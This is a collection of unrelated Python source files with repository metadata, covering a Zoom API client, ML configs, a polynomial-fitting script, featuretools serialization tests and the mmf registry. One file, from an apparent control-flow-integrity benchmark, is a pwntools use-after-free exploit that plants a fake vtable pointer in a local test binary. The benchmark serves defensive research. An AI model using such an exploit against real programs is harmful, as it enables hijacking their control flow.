5000827650d27c826e895b1b9691377111b3ef6b
|
[
"MIT"
] | 2
|
2021-02-09T10:40:50.000Z
|
2021-02-19T07:53:26.000Z
|
aiozoom/components/recording.py
|
vladisa88/aiozoom
|
5000827650d27c826e895b1b9691377111b3ef6b
|
[
"MIT"
] | null | null | null |
aiozoom/components/recording.py
|
vladisa88/aiozoom
|
5000827650d27c826e895b1b9691377111b3ef6b
|
[
"MIT"
] | null | null | null |
from aiozoom.components.base import Base
class Recording(Base):
"""
Class describing `Recording` logic of Zoom API
learn more:
https://marketplace.zoom.us/docs/api-reference/zoom-api/cloud-recording/
"""
async def get_recording(self, meeting_id: str) -> dict:
"""
Get meeting's recording information.
"""
method = f'/meetings/{meeting_id}/recordings'
return await self.base_get_request(method)
async def list_recordings(self, email: str) -> dict:
"""
List all cloud recordings related to user
"""
method = f'/users/{email}/recordings'
return await self.base_get_request(method)
async def delete_all_recording_files(self, meeting_id: str) -> dict:
"""
Delete all recording files of meeting
"""
method = f'/meetings/{meeting_id}/recordings'
return await self.base_delete_request(method)
async def delete_recording_file(
self, meeting_id: str, recording_id: str) -> dict:
"""
Delete a sprecific recording file from a meeting
"""
method = f'/meetings/{meeting_id}/recordings/{recording_id}'
return await self.base_delete_request(method)
| 31.871795
| 76
| 0.641191
|
bc66fa4b05d98fe77c61ec138056961f93eeb27f
| 351
|
py
|
Python
|
configs/dota_1.5/hbb/retinanet_r50_fpn_1x_dota1.5.py
|
liuyanyi/mmdetection
|
d2003536af6f08cb9bd7a75e0444eef03ace4bb3
|
[
"Apache-2.0"
] | null | null | null |
configs/dota_1.5/hbb/retinanet_r50_fpn_1x_dota1.5.py
|
liuyanyi/mmdetection
|
d2003536af6f08cb9bd7a75e0444eef03ace4bb3
|
[
"Apache-2.0"
] | null | null | null |
configs/dota_1.5/hbb/retinanet_r50_fpn_1x_dota1.5.py
|
liuyanyi/mmdetection
|
d2003536af6f08cb9bd7a75e0444eef03ace4bb3
|
[
"Apache-2.0"
] | null | null | null |
_base_ = [
'../../_base_/models/retinanet_r50_fpn.py',
'../../_base_/datasets/dota_detection_v1.5_hbb.py',
'../../_base_/schedules/schedule_2x.py', '../../_base_/default_runtime.py'
]
model = dict(
bbox_head=dict(
num_classes=16,
)
)
optimizer =dict(lr=0.01)
work_dir = './work_dirs/retinanet_r50_fpn_1x_dota'
| 25.071429
| 78
| 0.62963
|
8b8c0fa46dbd651a24431464ff14b52aeacb4abb
| 553
|
py
|
Python
|
cbench/virtual_call/vtable_reuse_uaf.py
|
vul337/cfi-eval
|
7d7801cf44cc650127d692c2a7222434375ac6aa
|
[
"Apache-2.0"
] | 16
|
2020-11-17T08:17:10.000Z
|
2022-03-16T07:47:44.000Z
|
cbench/virtual_call/vtable_reuse_uaf.py
|
vul337/cfi-eval
|
7d7801cf44cc650127d692c2a7222434375ac6aa
|
[
"Apache-2.0"
] | null | null | null |
cbench/virtual_call/vtable_reuse_uaf.py
|
vul337/cfi-eval
|
7d7801cf44cc650127d692c2a7222434375ac6aa
|
[
"Apache-2.0"
] | 4
|
2020-12-13T10:44:30.000Z
|
2021-12-20T13:34:37.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
r = process('./vtable_reuse_uaf')
def usenote():
r.recvuntil("4. exit\n")
r.sendline("1")
def afternote(_len,_data):
r.recvuntil("4. exit\n")
r.sendline("2")
r.recvuntil("len:")
r.sendline(_len)
r.recvuntil("data:")
r.sendline(_data)
def freenote():
r.recvuntil("4. exit\n")
r.sendline("3")
# plz set the vul vtable addr
vtable_add =0x401b10
freenote()
afternote("48",p64(vtable_add))
usenote()
r.interactive()
| 15.8
| 33
| 0.629295
|
be0a00ab69c8436198704dbd8236ce8831555e5f
| 613
|
py
|
Python
|
utils/config.py
|
recogni/tf-hrnet
|
1f21d9b86211de480f01ca1fda2f58e427e93261
|
[
"BSD-3-Clause"
] | 83
|
2019-08-19T08:40:35.000Z
|
2022-03-31T11:00:21.000Z
|
utils/config.py
|
Alabenba/tf-hrnet
|
949beb420d4a1af9974700534906184909e219ea
|
[
"BSD-3-Clause"
] | 14
|
2019-09-02T09:03:32.000Z
|
2022-02-09T23:32:18.000Z
|
netutils/config.py
|
sramirez/hrnet-pose-tf
|
5b7498d5fc86e18171f45ee6acfacbfea34a2339
|
[
"BSD-3-Clause"
] | 21
|
2019-08-20T02:38:55.000Z
|
2022-01-05T07:13:31.000Z
|
import configparser
import ast
def load_net_cfg_from_file(cfgfile):
def load_from_options(section, cfg):
options = dict()
xdict = dict(cfg.items(section))
for key, value in xdict.items():
try:
value = ast.literal_eval(value)
except:
value = value
options[key] = value
return options
cfg = configparser.ConfigParser()
cfg.read(cfgfile)
sections = cfg.sections()
options = dict()
for _section in sections:
options[_section] = load_from_options(_section, cfg)
return options
| 23.576923
| 60
| 0.598695
|
eaa619295d266558568d47f73256caf95bb64bc0
| 1,053
|
py
|
Python
|
Autonomous Work/AutonomousWork_2/Question4.py
|
Aujasvi-Moudgil/Classification-and-Representation-Learning
|
0ceb461f82d3d92f7d183fa7c8f61e20d53cfb52
|
[
"MIT"
] | null | null | null |
Autonomous Work/AutonomousWork_2/Question4.py
|
Aujasvi-Moudgil/Classification-and-Representation-Learning
|
0ceb461f82d3d92f7d183fa7c8f61e20d53cfb52
|
[
"MIT"
] | null | null | null |
Autonomous Work/AutonomousWork_2/Question4.py
|
Aujasvi-Moudgil/Classification-and-Representation-Learning
|
0ceb461f82d3d92f7d183fa7c8f61e20d53cfb52
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 8 13:55:10 2017
@author: Aujasvi
"""
from numpy import*
import matplotlib.pyplot as plt
#Load the dataset
data = loadtxt('polynome.data')
#Seprate the input from the output
X = data[:, 0]
Y = data[:, 1]
#Spliting the data into training & test data
X_train_data = X[:int((len(X))*.70)]
X_test_data = X[int(len(X)*.70):]
Y_train_data = Y[:int((len(Y))*.70)]
Y_test_data = Y[int(len(Y)*.70):]
print('X_train_data :', X_train_data)
print('X_test_data :', X_test_data)
print('Y_train_data :', Y_train_data)
print('Y_test_data :',Y_test_data)
for order in range(1,21):
w = polyfit(X_train_data,Y_train_data,order)
y = polyval (w,X_test_data)
#Genearlization Error on Test set
mse = ((Y_test_data-y)**2).mean(axis=None)
print('order='+str(order)+', mse='+str(mse))
#In case of overfitting train error is low, test error is high.
#In case of order 4 the test error is minimum & it is generalizing well but when we
#increasing the degree of polynome then the curve tends to overfit.
| 28.459459
| 83
| 0.690408
|
35698d18f457f905c436b4433f0d40e293fbe3ac
| 2,393
|
py
|
Python
|
collabfilter/databunch.py
|
manikyabard/DashAI
|
723f4c4ced3838e2872ec27848950f92c6c79b3e
|
[
"Apache-2.0"
] | 7
|
2020-08-26T09:36:54.000Z
|
2021-12-21T15:46:32.000Z
|
collabfilter/databunch.py
|
JoeRishon/DashAI
|
68d1b01088a65e2062d96b47b083fa8f5c82b27c
|
[
"Apache-2.0"
] | 16
|
2020-08-25T18:44:45.000Z
|
2022-03-25T19:12:36.000Z
|
collabfilter/databunch.py
|
JoeRishon/DashAI
|
68d1b01088a65e2062d96b47b083fa8f5c82b27c
|
[
"Apache-2.0"
] | 10
|
2020-09-30T19:27:17.000Z
|
2021-04-04T14:50:31.000Z
|
from fastai.collab import *
from core.databunch import DashDatabunch
class DashCollabDatabunch:
"""
Base DataBunch for collaborative filtering.
"""
@staticmethod
def create_collab_databunch(response):
"""
Creates a databunch for collaborative filtering using the values specified in response/DashUI.
Uses the csv name given in response>collab>input to create the input dataframe.
Creates a cat list using the user name and item name provided in the data.
Applies the required transformations and creates a collab list using the specified cat list.
The collab list is split into training and validation sets using the specified method and then labelled.
Finally it is converted to a databunch object and returned.
"""
path = Path('./')
# Step 1: Provide inputs
response_col = response['collab']
df = pd.read_csv(path / f'{response_col["input"]["csv_name"]}')
procs = list()
if response_col["transform"]['FillMissing']:
if hasattr(FillStrategy, f"{response_col['transform']['FillMissing']['fill_strategy']}"):
fill_strategy = getattr(FillStrategy, f"{response_col['transform']['FillMissing']['fill_strategy']}")
procs.append(partial(FillMissing, fill_strategy=fill_strategy,
fill_val=response_col['transform']['FillMissing']['fill_val'],
add_col=response_col['transform']['FillMissing']['add_col']))
if response_col['transform']['Categorify']:
procs.append(Categorify)
if response_col['transform']['Normalize']:
procs.append(Normalize)
procs = listify(procs)
user_name = response_col['input']['user_name']
item_name = response_col['input']['item_name']
rating = response_col['input']['rating']
cat_names = [user_name, item_name]
src = CollabList.from_df(df, cat_names=cat_names, procs=procs)
src = DashDatabunch.split_databunch(response, src)
# src = DashDatabunch.label_databunch(response, src)
# src=src.split_by_rand_pct(valid_pct=0.2,seed=None)
src = src.label_from_df(cols=rating)
# if test is not None: src.add_test(CollabList.from_df(test, cat_names=cat_names))
if response["collab"]["input"]['test_df']["has_test"]:
test_df = pd.read_csv(path / f"{response['collab']['input']['test_df']['csv_name']}")
src.add_test(CollabList.from_df(test_df, cat_names=cat_names))
return DashDatabunch.create_databunch(response, src)
| 41.982456
| 107
| 0.72127
|
c99e8a9b2a001df22e5de8465191094aa37e6bd6
| 18,343
|
py
|
Python
|
featuretools/tests/entityset_tests/test_serialization.py
|
ridicolos/featuretools
|
0af409da206e0b691ec64a3e0e618a43f1701dd9
|
[
"BSD-3-Clause"
] | 942
|
2020-11-10T02:59:39.000Z
|
2022-03-31T16:34:33.000Z
|
featuretools/tests/entityset_tests/test_serialization.py
|
167rgc911/featuretools
|
bbad3f7392b203b7b9c250a93465052e7fc06bbc
|
[
"BSD-3-Clause"
] | 721
|
2020-11-09T23:12:06.000Z
|
2022-03-31T22:33:35.000Z
|
featuretools/tests/entityset_tests/test_serialization.py
|
167rgc911/featuretools
|
bbad3f7392b203b7b9c250a93465052e7fc06bbc
|
[
"BSD-3-Clause"
] | 127
|
2020-11-10T10:12:30.000Z
|
2022-03-27T08:55:05.000Z
|
import json
import logging
import os
import tempfile
from urllib.request import urlretrieve
import boto3
import pandas as pd
import pytest
import woodwork.type_sys.type_system as ww_type_system
from woodwork.logical_types import Datetime, LogicalType, Ordinal
from woodwork.serialize import typing_info_to_dict
from woodwork.type_sys.utils import list_logical_types
from featuretools.entityset import EntitySet, deserialize, serialize
from featuretools.entityset.serialize import SCHEMA_VERSION
from featuretools.tests.testing_utils import to_pandas
from featuretools.utils.gen_utils import Library
BUCKET_NAME = "test-bucket"
WRITE_KEY_NAME = "test-key"
TEST_S3_URL = "s3://{}/{}".format(BUCKET_NAME, WRITE_KEY_NAME)
TEST_FILE = "test_serialization_data_entityset_schema_{}_2021_8_31.tar".format(SCHEMA_VERSION)
S3_URL = "s3://featuretools-static/" + TEST_FILE
URL = "https://featuretools-static.s3.amazonaws.com/" + TEST_FILE
TEST_KEY = "test_access_key_es"
def test_entityset_description(es):
description = serialize.entityset_to_description(es)
_es = deserialize.description_to_entityset(description)
assert es.metadata.__eq__(_es, deep=True)
def test_all_ww_logical_types():
logical_types = list_logical_types()['type_string'].to_list()
dataframe = pd.DataFrame(columns=logical_types)
es = EntitySet()
ltype_dict = {ltype: ltype for ltype in logical_types}
ltype_dict['ordinal'] = Ordinal(order=[])
es.add_dataframe(dataframe=dataframe, dataframe_name='all_types', index='integer', logical_types=ltype_dict)
description = serialize.entityset_to_description(es)
_es = deserialize.description_to_entityset(description)
assert es.__eq__(_es, deep=True)
def test_with_custom_ww_logical_type():
class CustomLogicalType(LogicalType):
pass
ww_type_system.add_type(CustomLogicalType)
columns = ['integer', 'natural_language', 'custom_logical_type']
dataframe = pd.DataFrame(columns=columns)
es = EntitySet()
ltype_dict = {
'integer': 'integer',
'natural_language': 'natural_language',
'custom_logical_type': CustomLogicalType,
}
es.add_dataframe(dataframe=dataframe, dataframe_name='custom_type', index='integer', logical_types=ltype_dict)
description = serialize.entityset_to_description(es)
_es = deserialize.description_to_entityset(description)
assert isinstance(_es['custom_type'].ww.logical_types['custom_logical_type'], CustomLogicalType)
assert es.__eq__(_es, deep=True)
def test_serialize_invalid_formats(es, tmpdir):
error_text = 'must be one of the following formats: {}'
error_text = error_text.format(', '.join(serialize.FORMATS))
with pytest.raises(ValueError, match=error_text):
serialize.write_data_description(es, path=str(tmpdir), format='')
def test_empty_dataframe(es):
for df in es.dataframes:
description = typing_info_to_dict(df)
dataframe = deserialize.empty_dataframe(description)
assert dataframe.empty
assert all(dataframe.columns == df.columns)
def test_to_csv(es, tmpdir):
es.to_csv(str(tmpdir), encoding='utf-8', engine='python')
new_es = deserialize.read_entityset(str(tmpdir))
assert es.__eq__(new_es, deep=True)
df = to_pandas(es['log'], index='id')
new_df = to_pandas(new_es['log'], index='id')
assert type(df['latlong'][0]) in (tuple, list)
assert type(new_df['latlong'][0]) in (tuple, list)
# Dask/Koalas don't support auto setting of interesting values with es.add_interesting_values()
def test_to_csv_interesting_values(pd_es, tmpdir):
pd_es.add_interesting_values()
pd_es.to_csv(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert pd_es.__eq__(new_es, deep=True)
def test_to_csv_manual_interesting_values(es, tmpdir):
es.add_interesting_values(dataframe_name='log', values={'product_id': ['coke_zero']})
es.to_csv(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert es.__eq__(new_es, deep=True)
assert new_es['log'].ww['product_id'].ww.metadata['interesting_values'] == ['coke_zero']
# Dask/Koalas do not support to_pickle
def test_to_pickle(pd_es, tmpdir):
pd_es.to_pickle(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert pd_es.__eq__(new_es, deep=True)
assert type(pd_es['log']['latlong'][0]) == tuple
assert type(new_es['log']['latlong'][0]) == tuple
def test_to_pickle_errors_dask(dask_es, tmpdir):
msg = 'DataFrame type not compatible with pickle serialization. Please serialize to another format.'
with pytest.raises(ValueError, match=msg):
dask_es.to_pickle(str(tmpdir))
def test_to_pickle_errors_koalas(ks_es, tmpdir):
msg = 'DataFrame type not compatible with pickle serialization. Please serialize to another format.'
with pytest.raises(ValueError, match=msg):
ks_es.to_pickle(str(tmpdir))
# Dask/Koalas do not support to_pickle
def test_to_pickle_interesting_values(pd_es, tmpdir):
pd_es.add_interesting_values()
pd_es.to_pickle(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert pd_es.__eq__(new_es, deep=True)
# Dask/Koalas do not support to_pickle
def test_to_pickle_manual_interesting_values(pd_es, tmpdir):
pd_es.add_interesting_values(dataframe_name='log', values={'product_id': ['coke_zero']})
pd_es.to_pickle(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert pd_es.__eq__(new_es, deep=True)
assert new_es['log'].ww['product_id'].ww.metadata['interesting_values'] == ['coke_zero']
def test_to_parquet(es, tmpdir):
es.to_parquet(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert es.__eq__(new_es, deep=True)
df = to_pandas(es['log'])
new_df = to_pandas(new_es['log'])
assert type(df['latlong'][0]) in (tuple, list)
assert type(new_df['latlong'][0]) in (tuple, list)
def test_to_parquet_manual_interesting_values(es, tmpdir):
es.add_interesting_values(dataframe_name='log', values={'product_id': ['coke_zero']})
es.to_parquet(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert es.__eq__(new_es, deep=True)
assert new_es['log'].ww['product_id'].ww.metadata['interesting_values'] == ['coke_zero']
# Dask/Koalas don't support auto setting of interesting values with es.add_interesting_values()
def test_to_parquet_interesting_values(pd_es, tmpdir):
pd_es.add_interesting_values()
pd_es.to_parquet(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert pd_es.__eq__(new_es, deep=True)
def test_to_parquet_with_lti(tmpdir, pd_mock_customer):
es = pd_mock_customer
es.to_parquet(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert es.__eq__(new_es, deep=True)
def test_to_pickle_id_none(tmpdir):
es = EntitySet()
es.to_pickle(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert es.__eq__(new_es, deep=True)
# TODO: Fix Moto tests needing to explicitly set permissions for objects
@pytest.fixture
def s3_client():
_environ = os.environ.copy()
from moto import mock_s3
with mock_s3():
s3 = boto3.resource('s3')
yield s3
os.environ.clear()
os.environ.update(_environ)
@pytest.fixture
def s3_bucket(s3_client):
s3_client.create_bucket(Bucket=BUCKET_NAME, ACL='public-read-write')
s3_bucket = s3_client.Bucket(BUCKET_NAME)
yield s3_bucket
def make_public(s3_client, s3_bucket):
obj = list(s3_bucket.objects.all())[0].key
s3_client.ObjectAcl(BUCKET_NAME, obj).put(ACL='public-read-write')
# TODO: tmp file disappears after deserialize step, cannot check equality with Dask, Koalas
def test_serialize_s3_csv(es, s3_client, s3_bucket):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('tmp file disappears after deserialize step, cannot check equality with Dask')
es.to_csv(TEST_S3_URL, encoding='utf-8', engine='python')
make_public(s3_client, s3_bucket)
new_es = deserialize.read_entityset(TEST_S3_URL)
assert es.__eq__(new_es, deep=True)
# Dask and Koalas do not support to_pickle
def test_serialize_s3_pickle(pd_es, s3_client, s3_bucket):
pd_es.to_pickle(TEST_S3_URL)
make_public(s3_client, s3_bucket)
new_es = deserialize.read_entityset(TEST_S3_URL)
assert pd_es.__eq__(new_es, deep=True)
# TODO: tmp file disappears after deserialize step, cannot check equality with Dask, Koalas
def test_serialize_s3_parquet(es, s3_client, s3_bucket):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('tmp file disappears after deserialize step, cannot check equality with Dask or Koalas')
es.to_parquet(TEST_S3_URL)
make_public(s3_client, s3_bucket)
new_es = deserialize.read_entityset(TEST_S3_URL)
assert es.__eq__(new_es, deep=True)
# TODO: tmp file disappears after deserialize step, cannot check equality with Dask, Koalas
def test_serialize_s3_anon_csv(es, s3_client, s3_bucket):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('tmp file disappears after deserialize step, cannot check equality with Dask or Koalas')
es.to_csv(TEST_S3_URL, encoding='utf-8', engine='python', profile_name=False)
make_public(s3_client, s3_bucket)
new_es = deserialize.read_entityset(TEST_S3_URL, profile_name=False)
assert es.__eq__(new_es, deep=True)
# Dask/Koalas do not support to_pickle
def test_serialize_s3_anon_pickle(pd_es, s3_client, s3_bucket):
pd_es.to_pickle(TEST_S3_URL, profile_name=False)
make_public(s3_client, s3_bucket)
new_es = deserialize.read_entityset(TEST_S3_URL, profile_name=False)
assert pd_es.__eq__(new_es, deep=True)
# TODO: tmp file disappears after deserialize step, cannot check equality with Dask, Koalas
def test_serialize_s3_anon_parquet(es, s3_client, s3_bucket):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('tmp file disappears after deserialize step, cannot check equality with Dask')
es.to_parquet(TEST_S3_URL, profile_name=False)
make_public(s3_client, s3_bucket)
new_es = deserialize.read_entityset(TEST_S3_URL, profile_name=False)
assert es.__eq__(new_es, deep=True)
def create_test_credentials(test_path):
with open(test_path, "w+") as f:
f.write("[test]\n")
f.write("aws_access_key_id=AKIAIOSFODNN7EXAMPLE\n")
f.write("aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n")
def create_test_config(test_path_config):
with open(test_path_config, "w+") as f:
f.write("[profile test]\n")
f.write("region=us-east-2\n")
f.write("output=text\n")
@pytest.fixture
def setup_test_profile(monkeypatch, tmpdir):
cache = str(tmpdir.join('.cache').mkdir())
test_path = os.path.join(cache, 'test_credentials')
test_path_config = os.path.join(cache, 'test_config')
monkeypatch.setenv("AWS_SHARED_CREDENTIALS_FILE", test_path)
monkeypatch.setenv("AWS_CONFIG_FILE", test_path_config)
monkeypatch.delenv("AWS_ACCESS_KEY_ID", raising=False)
monkeypatch.delenv("AWS_SECRET_ACCESS_KEY", raising=False)
monkeypatch.setenv("AWS_PROFILE", "test")
try:
os.remove(test_path)
os.remove(test_path_config)
except OSError:
pass
create_test_credentials(test_path)
create_test_config(test_path_config)
yield
os.remove(test_path)
os.remove(test_path_config)
def test_s3_test_profile(es, s3_client, s3_bucket, setup_test_profile):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('tmp file disappears after deserialize step, cannot check equality with Dask')
es.to_csv(TEST_S3_URL, encoding='utf-8', engine='python', profile_name='test')
make_public(s3_client, s3_bucket)
new_es = deserialize.read_entityset(TEST_S3_URL, profile_name='test')
assert es.__eq__(new_es, deep=True)
def test_serialize_url_csv(es):
error_text = "Writing to URLs is not supported"
with pytest.raises(ValueError, match=error_text):
es.to_csv(URL, encoding='utf-8', engine='python')
def test_serialize_subdirs_not_removed(es, tmpdir):
write_path = tmpdir.mkdir("test")
test_dir = write_path.mkdir("test_dir")
with open(str(write_path.join('data_description.json')), 'w') as f:
json.dump('__SAMPLE_TEXT__', f)
if es.dataframe_type == Library.KOALAS.value:
compression = 'none'
else:
compression = None
serialize.write_data_description(es, path=str(write_path), index='1', sep='\t', encoding='utf-8', compression=compression)
assert os.path.exists(str(test_dir))
with open(str(write_path.join('data_description.json')), 'r') as f:
assert '__SAMPLE_TEXT__' not in json.load(f)
def test_deserialize_local_tar(es):
with tempfile.TemporaryDirectory() as tmpdir:
temp_tar_filepath = os.path.join(tmpdir, TEST_FILE)
urlretrieve(URL, filename=temp_tar_filepath)
new_es = deserialize.read_entityset(temp_tar_filepath)
assert es.__eq__(new_es, deep=True)
def test_deserialize_url_csv(es):
new_es = deserialize.read_entityset(URL)
assert es.__eq__(new_es, deep=True)
def test_default_s3_csv(es):
new_es = deserialize.read_entityset(S3_URL)
assert es.__eq__(new_es, deep=True)
def test_anon_s3_csv(es):
new_es = deserialize.read_entityset(S3_URL, profile_name=False)
assert es.__eq__(new_es, deep=True)
def test_operations_invalidate_metadata(es):
new_es = EntitySet(id="test")
# test metadata gets created on access
assert new_es._data_description is None
assert new_es.metadata is not None # generated after access
assert new_es._data_description is not None
if not isinstance(es['customers'], pd.DataFrame):
customers_ltypes = es["customers"].ww.logical_types
customers_ltypes['signup_date'] = Datetime
else:
customers_ltypes = None
new_es.add_dataframe(es["customers"],
"customers",
index=es["customers"].index,
logical_types=customers_ltypes)
if not isinstance(es['sessions'], pd.DataFrame):
sessions_ltypes = es["sessions"].ww.logical_types
else:
sessions_ltypes = None
new_es.add_dataframe(es["sessions"],
"sessions",
index=es["sessions"].index,
logical_types=sessions_ltypes)
assert new_es._data_description is None
assert new_es.metadata is not None
assert new_es._data_description is not None
new_es = new_es.add_relationship("customers", "id", "sessions", "customer_id")
assert new_es._data_description is None
assert new_es.metadata is not None
assert new_es._data_description is not None
new_es = new_es.normalize_dataframe("customers", "cohort", "cohort")
assert new_es._data_description is None
assert new_es.metadata is not None
assert new_es._data_description is not None
new_es.add_last_time_indexes()
assert new_es._data_description is None
assert new_es.metadata is not None
assert new_es._data_description is not None
# automatically adding interesting values not supported in Dask or Koalas
if new_es.dataframe_type == Library.PANDAS.value:
new_es.add_interesting_values()
assert new_es._data_description is None
assert new_es.metadata is not None
assert new_es._data_description is not None
def test_reset_metadata(es):
assert es.metadata is not None
assert es._data_description is not None
es.reset_data_description()
assert es._data_description is None
def test_later_schema_version(es, caplog):
def test_version(major, minor, patch, raises=True):
version = '.'.join([str(v) for v in [major, minor, patch]])
if raises:
warning_text = ('The schema version of the saved entityset'
'(%s) is greater than the latest supported (%s). '
'You may need to upgrade featuretools. Attempting to load entityset ...'
% (version, SCHEMA_VERSION))
else:
warning_text = None
_check_schema_version(version, es, warning_text, caplog, 'warn')
major, minor, patch = [int(s) for s in SCHEMA_VERSION.split('.')]
test_version(major + 1, minor, patch)
test_version(major, minor + 1, patch)
test_version(major, minor, patch + 1)
test_version(major, minor - 1, patch + 1, raises=False)
def test_earlier_schema_version(es, caplog):
def test_version(major, minor, patch, raises=True):
version = '.'.join([str(v) for v in [major, minor, patch]])
if raises:
warning_text = ('The schema version of the saved entityset'
'(%s) is no longer supported by this version '
'of featuretools. Attempting to load entityset ...'
% (version))
else:
warning_text = None
_check_schema_version(version, es, warning_text, caplog, 'log')
major, minor, patch = [int(s) for s in SCHEMA_VERSION.split('.')]
test_version(major - 1, minor, patch)
test_version(major, minor - 1, patch, raises=False)
test_version(major, minor, patch - 1, raises=False)
def _check_schema_version(version, es, warning_text, caplog, warning_type=None):
dataframes = {dataframe.ww.name: typing_info_to_dict(dataframe) for dataframe in es.dataframes}
relationships = [relationship.to_dictionary() for relationship in es.relationships]
dictionary = {
'schema_version': version,
'id': es.id,
'dataframes': dataframes,
'relationships': relationships,
}
if warning_type == 'log' and warning_text:
logger = logging.getLogger('featuretools')
logger.propagate = True
deserialize.description_to_entityset(dictionary)
assert warning_text in caplog.text
logger.propagate = False
elif warning_type == 'warn' and warning_text:
with pytest.warns(UserWarning) as record:
deserialize.description_to_entityset(dictionary)
assert record[0].message.args[0] == warning_text
else:
deserialize.description_to_entityset(dictionary)
| 38.374477
| 126
| 0.71973
|
65f50cd1ab08b668d8b0446b3706294273164321
| 11,701
|
py
|
Python
|
mmf/common/registry.py
|
san2597/mmf
|
c0812e9281c6e679cb7f00af78a5eda267820aab
|
[
"BSD-3-Clause"
] | 2
|
2021-02-22T12:15:42.000Z
|
2021-05-02T15:22:24.000Z
|
mmf/common/registry.py
|
san2597/mmf
|
c0812e9281c6e679cb7f00af78a5eda267820aab
|
[
"BSD-3-Clause"
] | 7
|
2021-03-01T21:16:26.000Z
|
2022-02-27T07:07:11.000Z
|
mmf/common/registry.py
|
krantirk/MMF
|
2e4acaad7ca8eee4319e1205a560eed81733a0be
|
[
"BSD-3-Clause"
] | 1
|
2022-03-04T14:19:43.000Z
|
2022-03-04T14:19:43.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates.
"""
Registry is central source of truth in MMF. Inspired from Redux's
concept of global store, Registry maintains mappings of various information
to unique keys. Special functions in registry can be used as decorators to
register different kind of classes.
Import the global registry object using
``from mmf.common.registry import registry``
Various decorators for registry different kind of classes with unique keys
- Register a trainer: ``@registry.register_trainer``
- Register a dataset builder: ``@registry.register_builder``
- Register a metric: ``@registry.register_metric``
- Register a loss: ``@registry.register_loss``
- Register a fusion technique: ``@registery.register_fusion``
- Register a model: ``@registry.register_model``
- Register a processor: ``@registry.register_processor``
- Register a optimizer: ``@registry.register_optimizer``
- Register a scheduler: ``@registry.register_scheduler``
- Register a decoder: ``@registry.register_decoder``
"""
from mmf.utils.env import setup_imports
class Registry:
r"""Class for registry object which acts as central source of truth
for MMF
"""
mapping = {
# Mappings of builder name to their respective classes
# Use `registry.register_builder` to register a builder class
# with a specific name
# Further, use the name with the class is registered in the
# command line or configuration to load that specific dataset
"builder_name_mapping": {},
# Similar to the builder_name_mapping above except that this
# one is used to keep a mapping for dataset to its trainer class.
"trainer_name_mapping": {},
"model_name_mapping": {},
"metric_name_mapping": {},
"loss_name_mapping": {},
"fusion_name_mapping": {},
"optimizer_name_mapping": {},
"scheduler_name_mapping": {},
"processor_name_mapping": {},
"decoder_name_mapping": {},
"state": {},
}
@classmethod
def register_trainer(cls, name):
r"""Register a trainer to registry with key 'name'
Args:
name: Key with which the trainer will be registered.
Usage::
from mmf.common.registry import registry
from mmf.trainers.custom_trainer import CustomTrainer
@registry.register_trainer("custom_trainer")
class CustomTrainer():
...
"""
def wrap(trainer_cls):
cls.mapping["trainer_name_mapping"][name] = trainer_cls
return trainer_cls
return wrap
@classmethod
def register_builder(cls, name):
r"""Register a dataset builder to registry with key 'name'
Args:
name: Key with which the metric will be registered.
Usage::
from mmf.common.registry import registry
from mmf.datasets.base_dataset_builder import BaseDatasetBuilder
@registry.register_builder("vqa2")
class VQA2Builder(BaseDatasetBuilder):
...
"""
def wrap(builder_cls):
from mmf.datasets.base_dataset_builder import BaseDatasetBuilder
assert issubclass(
builder_cls, BaseDatasetBuilder
), "All builders must inherit BaseDatasetBuilder class"
cls.mapping["builder_name_mapping"][name] = builder_cls
return builder_cls
return wrap
@classmethod
def register_metric(cls, name):
r"""Register a metric to registry with key 'name'
Args:
name: Key with which the metric will be registered.
Usage::
from mmf.common.registry import registry
from mmf.modules.metrics import BaseMetric
@registry.register_metric("r@1")
class RecallAt1(BaseMetric):
...
"""
def wrap(func):
from mmf.modules.metrics import BaseMetric
assert issubclass(
func, BaseMetric
), "All Metric must inherit BaseMetric class"
cls.mapping["metric_name_mapping"][name] = func
return func
return wrap
@classmethod
def register_loss(cls, name):
r"""Register a loss to registry with key 'name'
Args:
name: Key with which the loss will be registered.
Usage::
from mmf.common.registry import registry
from torch import nn
@registry.register_task("logit_bce")
class LogitBCE(nn.Module):
...
"""
def wrap(func):
from torch import nn
assert issubclass(
func, nn.Module
), "All loss must inherit torch.nn.Module class"
cls.mapping["loss_name_mapping"][name] = func
return func
return wrap
@classmethod
def register_fusion(cls, name):
r"""Register a fusion technique to registry with key 'name'
Args:
name: Key with which the fusion technique will be registered
Usage::
from mmf.common.registry import registry
from torch import nn
@registry.register_fusion("linear_sum")
class LinearSum():
...
"""
def wrap(func):
from torch import nn
assert issubclass(
func, nn.Module
), "All Fusion must inherit torch.nn.Module class"
cls.mapping["fusion_name_mapping"][name] = func
return func
return wrap
@classmethod
def register_model(cls, name):
r"""Register a model to registry with key 'name'
Args:
name: Key with which the model will be registered.
Usage::
from mmf.common.registry import registry
from mmf.models.base_model import BaseModel
@registry.register_task("pythia")
class Pythia(BaseModel):
...
"""
def wrap(func):
from mmf.models.base_model import BaseModel
assert issubclass(
func, BaseModel
), "All models must inherit BaseModel class"
cls.mapping["model_name_mapping"][name] = func
return func
return wrap
@classmethod
def register_processor(cls, name):
r"""Register a processor to registry with key 'name'
Args:
name: Key with which the processor will be registered.
Usage::
from mmf.common.registry import registry
from mmf.datasets.processors import BaseProcessor
@registry.register_task("glove")
class GloVe(BaseProcessor):
...
"""
